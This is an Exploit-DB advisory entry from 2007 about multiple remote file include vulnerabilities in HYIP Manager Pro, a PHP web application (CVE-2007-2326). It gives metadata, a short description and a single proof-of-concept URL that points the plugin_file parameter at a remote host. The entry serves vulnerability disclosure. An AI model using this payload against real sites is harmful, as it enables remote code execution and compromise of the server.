HYIP Manager Pro Multiple Remote File Include Vulnerabilities

2007-04-25T00:00:00
ID EDB-ID:29909
Type exploitdb
Reporter alijsb
Modified 2007-04-25T00:00:00

Description

HYIP Manager Pro Multiple Remote File Include Vulnerabilities. CVE-2007-2326. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/23663/info

HYIP Manager Pro is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. 

http://www.example.com/inc/libs/Smarty_Compiler.class.php?plugin_file=http://www,example2.com